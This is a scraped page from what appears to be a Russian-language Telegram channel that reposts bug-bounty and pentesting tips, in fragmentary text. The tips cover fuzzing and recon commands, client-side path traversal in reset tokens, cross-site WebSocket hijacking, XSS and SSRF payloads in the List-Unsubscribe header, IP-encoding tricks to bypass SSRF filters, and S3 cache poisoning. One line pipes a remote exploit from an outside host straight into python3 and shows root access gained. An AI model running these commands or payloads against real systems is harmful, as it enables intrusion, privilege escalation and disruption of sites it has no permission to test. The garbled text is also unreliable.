Post #444
1.37K

- 👍 17
- 👎 2
🕷 Showing posts older than #445 · Back to latest

Forwarded from .unsec_ru

Forwarded from OWASP RU



ffuf -u https://api.example.com/api/PATH -X "POST" -H "Content-Type: CT" -w /path/to/content-types:CT -w /path/to/wordlist:PATH
Forwarded from .unsec_ru
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)

Хост, который не резолвится, всё ещё может быть полезной зацепкой. Он показывает, как устроена инфраструктура и где искать дальше.
302 Found
X-Backend-Host: auth-prod-use1-02.internal.example.com
authprod окружениеuse1https://payments-api.dev.example.com
payments-api с dev окружениемpayments-api.staging.example.com
payments.dev.example.com

subfinder -d target.com -silent | grep -iE
"(dev|stage|stag|uat|test|demo|sandbox|beta|internal)" | httpx -silent -status-code -title


Settings → Network → HTTP → Streaming responses
HTTP Transfer-Encoding запрос и заголовок ответа определяют форму кодирования, используемую для передачи сообщений между узлами сети. chunked. В Burp по умолчанию он их «собирает» и показывает как обычный ответ.HTTP/2 запрещает любое использование Transfer-Encoding заголовка. HTTP/2 и более поздние версии предоставляют более эффективные механизмы потоковой передачи данных, чем передача чанками.
Forwarded from Другая сторона багбаунти


../../../file) работает на сервере. Здесь идея та же, но на стороне клиента.https://target.com/reset/token?user=victim&Token=810128475189
Token участвует в формировании пути или редиректа, его можно изменить:https://target.com/reset/token?user=victim&Token=810128475189%2F..%2F..%2Fuser
https://target.com/user

GET /chat
Connection: Upgrade
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
ws:// или wss://.Origin, ты можешь заставить браузер жертвы открыть WS-соединение и украсть данные. {"user_id": 1337, "action": "delete"}
getParam vs getParam[]
:443 vs :000443
Forwarded from Пост Лукацкого

Forwarded from Пост Лукацкого


List-Unsubscribe — стандартизированный RFC 8058 SMTP-заголовок, который включает URI вида mailto: и HTTP для действий отписки. javascript: в List-Unsubscribe. Когда ссылка отписки отображается в бэкенд/админ-панели, выполняется JS.List-Unsubscribe. allow local remote servers:Enabled = internal accessDisabled = external targets onlyList-Unsubscribe, проверяй возможность SSRF через target URI и blind XSS через пэйлоады в этом заголовке.

8.8.1028 → Объединяет 3-й и 4-й октеты: 4 × 256 + 4 = 10288.525316 → Объединяет последние три октета в одно десятичное число0x08.8.004.004 → Шестнадцатеричный + десятичный + восьмеричный (сегмент за сегментом)0x08.0x08.004.004 → Два сегмента в hex, два в восьмеричном0x08.010.4.4 → Смешанный hex + восьмеричный + десятичный134743044 → Полное 32-битное целое представление IP-адреса0x08080404 → Весь IP закодирован как одно hex-число010.010.004.004 → Каждый сегмент с ведущим нулём, чтобы форсировать восьмеричную интерпретацию0x8.0x8.0x4.0x4 → Все четыре октета закодированы индивидуально в шестнадцатеричном виде8.8.0x404 → Последний сегмент в hex: 0x404 = 1028curl/ping, но могут срабатывать в других библиотеках/языках: ⑧.⑧.④.④, 𝟠.𝟠.𝟜.𝟜.Forwarded from BlackFan
?tagging, что часто разрешают для неавторизованных запросов.https://site.tld/static/somefile.js?tagging
<?xml version="1.0" encoding="UTF-8"?>
<Tagging xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<TagSet></TagSet>
</Tagging>
?tagging, ?acl и подобные методы возвращают 403, можно попробовать параметры из GetObject API и, например, закэшировать некорректный Content-Type, указав в запросе ?response-content-type=text/html. Это приведет к тому, что браузер откажется выполнять JavaScript с некорректным типом, что также приведет к нарушению работы сайта (это поведение еще зависит от наличия в ответе заголовка X-Content-Type-Options: nosniff).?tagging или ?response-content-type=text/html